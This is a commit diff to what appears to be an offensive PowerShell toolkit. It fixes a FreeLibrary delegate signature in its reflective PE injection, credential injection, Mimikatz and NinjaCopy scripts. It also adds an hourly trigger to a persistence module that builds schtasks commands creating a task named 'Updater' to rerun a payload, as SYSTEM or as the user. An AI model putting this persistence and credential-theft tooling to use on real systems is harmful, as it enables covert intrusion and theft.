diff options
| -rw-r--r-- | CodeExecution/Invoke-ReflectivePEInjection.ps1 | 2 | ||||
| -rw-r--r-- | Exfiltration/Invoke-CredentialInjection.ps1 | 2 | ||||
| -rw-r--r-- | Exfiltration/Invoke-Mimikatz.ps1 | 2 | ||||
| -rw-r--r-- | Exfiltration/Invoke-NinjaCopy.ps1 | 2 | ||||
| -rw-r--r-- | Persistence/Persistence.psm1 | 40 |
5 files changed, 44 insertions, 4 deletions
diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 990c4b1..42900fb 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -648,7 +648,7 @@ $RemoteScriptBlock = { $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary - $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr]) + $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool]) $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary diff --git a/Exfiltration/Invoke-CredentialInjection.ps1 b/Exfiltration/Invoke-CredentialInjection.ps1 index a7b312d..d6f3c4c 100644 --- a/Exfiltration/Invoke-CredentialInjection.ps1 +++ b/Exfiltration/Invoke-CredentialInjection.ps1 @@ -771,7 +771,7 @@ function Invoke-CredentialInjection $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary - $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr]) + $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool]) $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary diff --git a/Exfiltration/Invoke-Mimikatz.ps1 b/Exfiltration/Invoke-Mimikatz.ps1 index c701f63..f95daa3 100644 --- a/Exfiltration/Invoke-Mimikatz.ps1 +++ b/Exfiltration/Invoke-Mimikatz.ps1 @@ -540,7 +540,7 @@ $RemoteScriptBlock = { $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary - $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr]) + $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool]) $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary diff --git a/Exfiltration/Invoke-NinjaCopy.ps1 b/Exfiltration/Invoke-NinjaCopy.ps1 index 15bee1b..f22d5f5 100644 --- a/Exfiltration/Invoke-NinjaCopy.ps1 +++ b/Exfiltration/Invoke-NinjaCopy.ps1 @@ -572,7 +572,7 @@ $RemoteScriptBlock = { $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary - $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr]) + $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool]) $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary diff --git a/Persistence/Persistence.psm1 b/Persistence/Persistence.psm1 index b27b981..0861af6 100644 --- a/Persistence/Persistence.psm1 +++ b/Persistence/Persistence.psm1 @@ -55,6 +55,10 @@ function New-ElevatedPersistenceOption Starts the payload daily. +.PARAMETER Hourly + + Starts the payload hourly. + .PARAMETER At Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. @@ -83,6 +87,7 @@ function New-ElevatedPersistenceOption $PermanentWMI, [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] [Switch] @@ -97,6 +102,10 @@ function New-ElevatedPersistenceOption [Switch] $Daily, + [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )] + [Switch] + $Hourly, + [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] [DateTime] @@ -156,6 +165,12 @@ function New-ElevatedPersistenceOption $PersistenceOptionsTable['Time'] = $At } + 'ScheduledTaskHourly' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'Hourly' + } + 'Registry' { $PersistenceOptionsTable['Method'] = 'Registry' @@ -214,6 +229,10 @@ function New-UserPersistenceOption Starts the payload daily. +.PARAMETER Hourly + + Starts the payload hourly. + .PARAMETER At Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. @@ -233,6 +252,7 @@ function New-UserPersistenceOption [CmdletBinding()] Param ( [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] + [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] [Switch] $ScheduledTask, @@ -245,6 +265,10 @@ function New-UserPersistenceOption [Switch] $Daily, + [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )] + [Switch] + $Hourly, + [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] [DateTime] $At, @@ -285,6 +309,12 @@ function New-UserPersistenceOption $PersistenceOptionsTable['Time'] = $At } + 'ScheduledTaskHourly' + { + $PersistenceOptionsTable['Method'] = 'ScheduledTask' + $PersistenceOptionsTable['Trigger'] = 'Hourly' + } + 'Registry' { $PersistenceOptionsTable['Method'] = 'Registry' @@ -574,6 +604,11 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR " } + 'Hourly' + { + $ElevatedTrigger = "schtasks /Create /RU system /SC HOURLY /TN Updater /TR " + } + 'OnIdle' { $ElevatedTrigger = "schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR " @@ -617,6 +652,11 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR " } + 'Hourly' + { + $UserTrigger = "schtasks /Create /SC HOURLY /TN Updater /TR " + } + 'OnIdle' { $UserTrigger = "schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR " |